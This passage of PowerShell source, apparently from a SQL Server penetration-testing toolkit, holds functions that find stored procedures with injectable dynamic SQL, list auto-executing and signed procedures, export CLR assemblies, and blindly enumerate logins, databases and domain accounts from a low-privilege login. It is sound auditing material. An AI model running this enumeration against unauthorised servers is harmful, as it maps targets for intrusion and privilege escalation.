AS [DatabaseName], ROUTINE_SCHEMA AS [SchemaName], ROUTINE_NAME as [ProcedureName], ROUTINE_TYPE as [ProcedureType], ROUTINE_DEFINITION as [ProcedureDefinition], SQL_DATA_ACCESS, ROUTINE_BODY, CREATED, LAST_ALTERED, b.is_ms_shipped, b.is_auto_executed FROM [INFORMATION_SCHEMA].[ROUTINES] a JOIN [sys].[procedures] b ON a.ROUTINE_NAME = b.name WHERE 1=1 AND (ROUTINE_DEFINITION like '%sp_executesql%' OR ROUTINE_DEFINITION like '%sp_sqlexec%' OR ROUTINE_DEFINITION like '%exec @%' OR ROUTINE_DEFINITION like '%execute @%' OR ROUTINE_DEFINITION like '%exec (%' OR ROUTINE_DEFINITION like '%exec(%' OR ROUTINE_DEFINITION like '%execute (%' OR ROUTINE_DEFINITION like '%execute(%' OR ROUTINE_DEFINITION like '%''''''+%' OR ROUTINE_DEFINITION like '%'''''' +%') AND ROUTINE_DEFINITION like '%+%' AND ROUTINE_CATALOG not like 'msdb' $AutoExecFilter $ProcedureNameFilter $KeywordFilter ORDER BY ROUTINE_NAME" # Define query for signed procedures if($OnlySigned){ $Query = " use [$DbName]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], spr.ROUTINE_CATALOG as DB_NAME, spr.SPECIFIC_SCHEMA as SCHEMA_NAME, spr.ROUTINE_NAME as SP_NAME, spr.ROUTINE_DEFINITION as SP_CODE, CASE cp.crypt_type when 'SPVC' then cer.name when 'CPVC' then Cer.name when 'SPVA' then ak.name when 'CPVA' then ak.name END as CERT_NAME, sp.name as CERT_LOGIN, sp.sid as CERT_SID FROM sys.crypt_properties cp JOIN sys.objects o ON cp.major_id = o.object_id LEFT JOIN sys.certificates cer ON cp.thumbprint = cer.thumbprint LEFT JOIN sys.asymmetric_keys ak ON cp.thumbprint = ak.thumbprint LEFT JOIN INFORMATION_SCHEMA.ROUTINES spr on spr.ROUTINE_NAME = o.name LEFT JOIN sys.server_principals sp on sp.sid = cer.sid WHERE o.type_desc = 'SQL_STORED_PROCEDURE'AND (ROUTINE_DEFINITION like '%sp_executesql%' OR ROUTINE_DEFINITION like '%sp_sqlexec%' OR ROUTINE_DEFINITION like '%exec @%' OR ROUTINE_DEFINITION like '%exec (%' OR ROUTINE_DEFINITION like '%exec(%' OR ROUTINE_DEFINITION like '%execute @%' OR ROUTINE_DEFINITION like '%execute (%' OR ROUTINE_DEFINITION like '%execute(%' OR ROUTINE_DEFINITION like '%''''''+%' OR ROUTINE_DEFINITION like '%'''''' +%') AND ROUTINE_CATALOG not like 'msdb' AND ROUTINE_DEFINITION like '%+%'" } # Execute Query $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Count results $TblProcsCount = $TblProcsTemp.rows.count Write-Verbose "$Instance : - $TblProcsCount found in $DbName database" # Append results $TblProcs = $TblProcs + $TblProcsTemp } } End { # Return data $TblProcs } } # ---------------------------------- # Get-SQLStoredProcedureAutoExec # ---------------------------------- # Author: Scott Sutherland Function Get-SQLStoredProcedureAutoExec { <# .SYNOPSIS Returns stored procedures from target SQL Servers. Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER ProcedureName Procedure name to filter for. .PARAMETER Keyword Filter for procedures that include the keyword. .EXAMPLE PS C:\> Get-SQLStoredProcedureAutoExec -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : dbo ProcedureName : MyTestProc ProcedureType : PROCEDURE ProcedureDefinition : CREATE PROC MyTestProc WITH EXECUTE AS OWNER as begin select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin end SQL_DATA_ACCESS : MODIFIES ROUTINE_BODY : SQL CREATED : 7/24/2016 3:16:29 PM LAST_ALTERED : 7/24/2016 3:16:29 PM is_ms_shipped : False is_auto_executed : TRUE .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureAutoExec -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Procedure name.')] [string]$ProcedureName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for procedures that include the keyword.')] [string]$Keyword, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblProcs = New-Object -TypeName System.Data.DataTable # Setup routine name filter if ($ProcedureName) { $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" } else { $ProcedureNameFilter = '' } # Setup ROUTINE_DEFINITION filter if ($Keyword) { $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" } else { $KeywordFilter = '' } } Process { # Parse ComputerName If ($Instance) { $ComputerName = $Instance.split('\')[0].split(',')[0] $Instance = $Instance } else { $ComputerName = $env:COMPUTERNAME $Instance = '.\' } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Checking for autoexec stored procedures..." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName # Define Query $Query = " use [master]; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], ROUTINE_CATALOG AS [DatabaseName], ROUTINE_SCHEMA AS [SchemaName], ROUTINE_NAME as [ProcedureName], ROUTINE_TYPE as [ProcedureType], ROUTINE_DEFINITION as [ProcedureDefinition], SQL_DATA_ACCESS, ROUTINE_BODY, CREATED, LAST_ALTERED, b.is_ms_shipped, b.is_auto_executed FROM [INFORMATION_SCHEMA].[ROUTINES] a JOIN [sys].[procedures] b ON a.ROUTINE_NAME = b.name WHERE 1=1 AND is_auto_executed = 1 $ProcedureNameFilter $KeywordFilter" # Execute Query $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if(-not $TblProcsTemp){ #Write-Verbose -Message "$Instance : No autoexec procedures found." } # Append results $TblProcs = $TblProcs + $TblProcsTemp } } End { # Return data $TblProcs } } #endregion ######################################################################### # #region UTILITY FUNCTIONS # ######################################################################### # ---------------------------------- # Get-SQLAssemblyFile # ---------------------------------- # Author: Scott Sutherland Function Get-SQLAssemblyFile { <# .SYNOPSIS Returns assembly file information for each database. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER DatabaseUser Database user to filter for. .PARAMETER NoDefaults Only show information for non default databases. .PARAMETER ExportFolder Folder to export CLR DLL files to. .PARAMETER AssemblyName Filter for assembly names that contain the provided word. .EXAMPLE PS C:\> Get-SQLAssemblyFile -Verbose -Instance SQLServer1\Instance1 | ft -AutoSize VERBOSE: SQLServer1\Instance1 : Connection Success. VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from master. VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from tempdb. VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from msdb. ComputerName Instance DatabaseName assembly_id name file_id content ------------ -------- ------------ ----------- ---- ------- ------- MSSQLSRV04 SQLServer1\Instance1 master 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... MSSQLSRV04 SQLServer1\Instance1 tempdb 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... MSSQLSRV04 SQLServer1\Instance1 msdb 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLAssemblyfile -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for filenames.')] [string]$AssemblyName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Folder to export DLLs to.')] [string]$ExportFolder, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Do not show database users associated with default databases.')] [Switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblAssemblyFiles = New-Object -TypeName System.Data.DataTable $null = $TblAssemblyFiles.Columns.Add('ComputerName') $null = $TblAssemblyFiles.Columns.Add('Instance') $null = $TblAssemblyFiles.Columns.Add('DatabaseName') $null = $TblAssemblyFiles.Columns.Add('assembly_id') $null = $TblAssemblyFiles.Columns.Add('assembly_name') $null = $TblAssemblyFiles.Columns.Add('file_id') $null = $TblAssemblyFiles.Columns.Add('file_name') $null = $TblAssemblyFiles.Columns.Add('clr_name') $null = $TblAssemblyFiles.Columns.Add('content') $null = $TblAssemblyFiles.Columns.Add('permission_set_desc') $null = $TblAssemblyFiles.Columns.Add('create_date') $null = $TblAssemblyFiles.Columns.Add('modify_date') $null = $TblAssemblyFiles.Columns.Add('is_user_defined') } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases if($NoDefaults) { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults } else { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose } # Setup assembly name filter if($AssemblyName){ $AssemblyNameQuery = "WHERE af.name LIKE '%$AssemblyName%'" }else{ $AssemblyNameQuery = "" } # Get the privs for each database $TblDatabases | ForEach-Object -Process { # Set DatabaseName filter $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Grabbing assembly file information from $DbName." } # Define Query $Query = "USE $DbName; SELECT af.assembly_id, a.name as assembly_name, af.file_id, af.name as file_name, a.clr_name, af.content, a.permission_set_desc, a.create_date, a.modify_date, a.is_user_defined FROM sys.assemblies a INNER JOIN sys.assembly_files af ON a.assembly_id = af.assembly_id $AssemblyNameQuery" # Execute Query $TblAssemblyFilesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Add each result to table $TblAssemblyFilesTemp | ForEach-Object -Process { # Add results to table $null = $TblAssemblyFiles.Rows.Add( [string]$ComputerName, [string]$Instance, [string]$DbName, [string]$_.assembly_id, [string]$_.assembly_name, [string]$_.file_id, [string]$_.file_name, [string]$_.clr_name, [string]$_.content, [string]$_.permission_set_desc, [string]$_.create_date, [string]$_.modify_date, [string]$_.is_user_defined) # Export dll if($ExportFolder){ # Create export folder $ExportOutputFolder = "$ExportFolder\CLRExports" If ((test-path $ExportOutputFolder) -eq $False){ Write-Verbose "$instance : Creating export folder: $ExportOutputFolder" $null = New-Item -Path "$ExportOutputFolder" -type directory } # Create instance subfolder if it doesnt exist $InstanceClean = $Instance -replace('\\','_') $ServerPath = "$ExportOutputFolder\$InstanceClean" If ((test-path $Serverpath) -eq $False){ Write-Verbose "$instance : Creating server folder: $ServerPath" $null = New-Item -Path "$ServerPath" -type directory } # Create database subfolder if it doesnt exist $Databasepath = "$ServerPath\$DbName" If ((test-path $Databasepath) -eq $False){ Write-Verbose "$instance : Creating database folder: $Databasepath" $null = New-Item $Databasepath -type directory } # Create dll file if it doesnt exist $CLRFilename = $_.file_name Write-Verbose "$instance : - Exporting $CLRFilename.dll" $FullExportPath = "$Databasepath\$CLRFilename.dll" $_.content | Set-Content -Encoding Byte $FullExportPath } } } } End { # Return data $TblAssemblyFiles } } # ---------------------------------- # Get-SQLFuzzObjectName # ---------------------------------- # Author: Scott Sutherland # Reference: https://raresql.com/2013/01/29/sql-server-all-about-object_id/ # Reference: https://social.technet.microsoft.com/Forums/forefront/en-US/f73c2115-57f7-4cec-a95b-00c2d8252ace/objectid-recycled-?forum=transactsql Function Get-SQLFuzzObjectName { <# .SYNOPSIS Enumerates objects based on object id using OBJECT_NAME() and only the Public role. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER StartId Principal ID to start fuzzing with. .PARAMETER EndId Principal ID to stop fuzzing with. .EXAMPLE PS C:\> Get-SQLFuzzObjectName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 ComputerName Instance ObjectId ObjectName ------------ -------- -------- ---------- SQLServer1 SQLServer1\STANDARDDEV2014 3 sysrscols SQLServer1 SQLServer1\STANDARDDEV2014 5 sysrowsets SQLServer1 SQLServer1\STANDARDDEV2014 6 sysclones SQLServer1 SQLServer1\STANDARDDEV2014 7 sysallocunits SQLServer1 SQLServer1\STANDARDDEV2014 8 sysfiles1 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to start fuzzing with.')] [string]$StartId = 1, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to stop fuzzing on.')] [string]$EndId = 300, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblFuzzedObjects = New-Object -TypeName System.Data.DataTable } Process { # All user defined objects are assigned a positive object ID plus system tables. # Apart from these objects, the rest of the system objects are assigned negative object IDs. # This object_id comes from the primary key of system table sys.sysschobjs.The column name is id, int data type and it is not an identity column # If you create a new object in the database, the first ID will always be 2073058421 in SQL SERVER 2005 and 245575913 in SQL SERVER 2012. # The object_ID increment counter for user defined objects will add 16000057 + Last user defined object_ID and will give you a new ID. <# IThis object_id comes from the primary key of system table sys.sysschobjs. The new object_id will increase 16000057 (a prime number) from last object_id. When the last object_id +16000057 is over the int maximum ( 2147483647), it will start with a new number before the difference between the new bigint number and the maximum int. This cycle will generate 134 or 135 new object_id for each cycle. The system has a maximum number of objects, which is 2147483647. The object ID is only unique within each database. #> # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Enumerating objects from object IDs..." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Fuzz from StartId to EndId $StartId..$EndId | ForEach-Object -Process { # Define Query $Query = "SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$_' as [ObjectId], OBJECT_NAME($_) as [ObjectName]" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ObjectName = $TblResults.ObjectName if( -not $SuppressVerbose) { if($ObjectName.length -ge 2) { Write-Verbose -Message "$Instance : - Object ID $_ resolved to: $ObjectName" } else { Write-Verbose -Message "$Instance : - Object ID $_ resolved to: " } } # Append results $TblFuzzedObjects = $TblFuzzedObjects + $TblResults } } End { # Return data $TblFuzzedObjects | Where-Object -FilterScript { $_.ObjectName.length -ge 2 } } } # ---------------------------------- # Get-SQLFuzzDatabaseName # ---------------------------------- # Author: Scott Sutherland Function Get-SQLFuzzDatabaseName { <# .SYNOPSIS Enumerates databases based on database id using DB_NAME() and only the Public role. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER StartId Principal ID to start fuzzing with. .PARAMETER EndId Principal ID to stop fuzzing with. .EXAMPLE PS C:\> Get-SQLFuzzDatabaseName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 ComputerName Instance DatabaseId DatabaseName ------------ -------- ---------- ------------ SQLServer1 SQLServer1\STANDARDDEV2014 1 master SQLServer1 SQLServer1\STANDARDDEV2014 2 tempdb SQLServer1 SQLServer1\STANDARDDEV2014 3 model SQLServer1 SQLServer1\STANDARDDEV2014 4 msdb SQLServer1 SQLServer1\STANDARDDEV2014 5 ReportServer$STANDARDDEV2014 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to start fuzzing with.')] [string]$StartId = 1, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to stop fuzzing on.')] [string]$EndId = 300, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblFuzzedDbs = New-Object -TypeName System.Data.DataTable } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Enumerating database names from database IDs..." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Fuzz from StartId to EndId $StartId..$EndId | ForEach-Object -Process { # Define Query $Query = "SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$_' as [DatabaseId], DB_NAME($_) as [DatabaseName]" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $DatabaseName = $TblResults.DatabaseName if($DatabaseName.length -ge 2) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - ID $_ - Resolved to: $DatabaseName" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - ID $_ - Resolved to:" } } # Append results $TblFuzzedDbs = $TblFuzzedDbs + $TblResults } } End { # Return data $TblFuzzedDbs | Where-Object -FilterScript { $_.DatabaseName.length -ge 2 } } } # ---------------------------------- # Get-SQLFuzzServerLogin # ---------------------------------- # Author: Scott Sutherland Function Get-SQLFuzzServerLogin { <# .SYNOPSIS Enumerates SQL Server Logins based on login id using SUSER_NAME() and only the Public role. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FuzzNum The number of Principal IDs to fuzz during blind SQL login enumeration as a least privilege login. .PARAMETER GetRole Checks if the principal name is a role, SQL login, or Windows account. .EXAMPLE PS C:\> Get-SQLFuzzServerLogin -Instance SQLServer1\STANDARDDEV2014 -StartId 1 -EndId 500 | Select-Object -First 40 ComputerName Instance PrincipalId PrincipleName ------------ -------- ---------- ------------- SQLServer1 SQLServer1\STANDARDDEV2014 1 sa SQLServer1 SQLServer1\STANDARDDEV2014 2 public SQLServer1 SQLServer1\STANDARDDEV2014 3 sysadmin SQLServer1 SQLServer1\STANDARDDEV2014 4 securityadmin SQLServer1 SQLServer1\STANDARDDEV2014 5 serveradmin SQLServer1 SQLServer1\STANDARDDEV2014 6 setupadmin SQLServer1 SQLServer1\STANDARDDEV2014 7 processadmin SQLServer1 SQLServer1\STANDARDDEV2014 8 diskadmin SQLServer1 SQLServer1\STANDARDDEV2014 9 dbcreator SQLServer1 SQLServer1\STANDARDDEV2014 10 bulkadmin SQLServer1 SQLServer1\STANDARDDEV2014 101 ##MS_SQLResourceSigningCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 102 ##MS_SQLReplicationSigningCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 103 ##MS_SQLAuthenticatorCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 105 ##MS_PolicySigningCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 106 ##MS_SmoExtendedSigningCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 121 ##Agent XPs## SQLServer1 SQLServer1\STANDARDDEV2014 122 ##SQL Mail XPs## SQLServer1 SQLServer1\STANDARDDEV2014 123 ##Database Mail XPs## SQLServer1 SQLServer1\STANDARDDEV2014 124 ##SMO and DMO XPs## SQLServer1 SQLServer1\STANDARDDEV2014 125 ##Ole Automation Procedures## SQLServer1 SQLServer1\STANDARDDEV2014 126 ##Web Assistant Procedures## SQLServer1 SQLServer1\STANDARDDEV2014 127 ##xp_cmdshell## SQLServer1 SQLServer1\STANDARDDEV2014 128 ##Ad Hoc Distributed Queries## SQLServer1 SQLServer1\STANDARDDEV2014 129 ##Replication XPs## SQLServer1 SQLServer1\STANDARDDEV2014 257 ##MS_PolicyTsqlExecutionLogin## SQLServer1 SQLServer1\STANDARDDEV2014 259 Domain\User SQLServer1 SQLServer1\STANDARDDEV2014 260 NT SERVICE\SQLWriter SQLServer1 SQLServer1\STANDARDDEV2014 261 NT SERVICE\Winmgmt SQLServer1 SQLServer1\STANDARDDEV2014 262 NT Service\MSSQL$STANDARDDEV2014 SQLServer1 SQLServer1\STANDARDDEV2014 263 NT AUTHORITY\SYSTEM SQLServer1 SQLServer1\STANDARDDEV2014 264 NT SERVICE\SQLAgent$STANDARDDEV2014 SQLServer1 SQLServer1\STANDARDDEV2014 265 NT SERVICE\ReportServer$STANDARDDEV2014 SQLServer1 SQLServer1\STANDARDDEV2014 266 ##MS_PolicyEventProcessingLogin## SQLServer1 SQLServer1\STANDARDDEV2014 267 ##MS_AgentSigningCertificate## SQLServer1 SQLServer1\STANDARDDEV2014 268 MySQLUser1 SQLServer1 SQLServer1\STANDARDDEV2014 270 MySQLUser2 SQLServer1 SQLServer1\STANDARDDEV2014 271 MySQLUser3 SQLServer1 SQLServer1\STANDARDDEV2014 272 MySysadmin1 SQLServer1 SQLServer1\STANDARDDEV2014 273 Domain\User2 SQLServer1 SQLServer1\STANDARDDEV2014 274 MySysadmin2 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Number of Principal IDs to fuzz.')] [string]$FuzzNum = 10000, [Parameter(Mandatory = $false, HelpMessage = 'Try to determine if the principal type is role, SQL login, or Windows account via error analysis of sp_defaultdb.')] [switch]$GetPrincipalType, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblFuzzedLogins = New-Object -TypeName System.Data.DataTable $null = $TblFuzzedLogins.Columns.add('ComputerName') $null = $TblFuzzedLogins.Columns.add('Instance') $null = $TblFuzzedLogins.Columns.add('PrincipalId') $null = $TblFuzzedLogins.Columns.add('PrincipleName') if($GetPrincipalType) { $null = $TblFuzzedLogins.Columns.add('PrincipleType') } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Enumerating principal names from $FuzzNum principal IDs.." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query # Reference: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7 $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], n [PrincipalId], SUSER_NAME(n) as [PrincipleName] from ( select top $FuzzNum row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Process results $TblResults | ForEach-Object { # check if principal is role, sql login, or windows account $PrincipalName = $_.PrincipleName $PrincipalId = $_.PrincipalId if($GetPrincipalType) { $RoleCheckQuery = "EXEC master..sp_defaultdb '$PrincipalName', 'NOTAREALDATABASE1234ABCD'" $RoleCheckResults = Get-SQLQuery -Instance $Instance -Query $RoleCheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -ReturnError # Check the error message for a signature that means the login is real if (($RoleCheckResults -like '*NOTAREALDATABASE*') -or ($RoleCheckResults -like '*alter the login*')) { if($PrincipalName -like '*\*') { $PrincipalType = 'Windows Account' } else { $PrincipalType = 'SQL Login' } } else { $PrincipalType = 'SQL Server Role' } } # Add to result set if($GetPrincipalType) { $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName, $PrincipalType) } else { $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName) } } } End { # Return data $TblFuzzedLogins | Where-Object -FilterScript { $_.PrincipleName.length -ge 2 } if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Complete." } } } # ---------------------------------- # Get-SQLFuzzDomainAccount # ---------------------------------- # Author: Scott Sutherland Function Get-SQLFuzzDomainAccount { <# .SYNOPSIS Enumerates domain groups, computer accounts, and user accounts based on domain RID using SUSER_SNAME() and only the Public role. Note: In a typical domain 10000 or more is recommended for the EndId. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Domain Set a custom domain for user enumeration. Typically used to target trusted domains. .PARAMETER StartId RID to start fuzzing with. .PARAMETER EndId RID to stop fuzzing with. .EXAMPLE PS C:\> Get-SQLFuzzDomainAccount -Instance SQLServer1\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 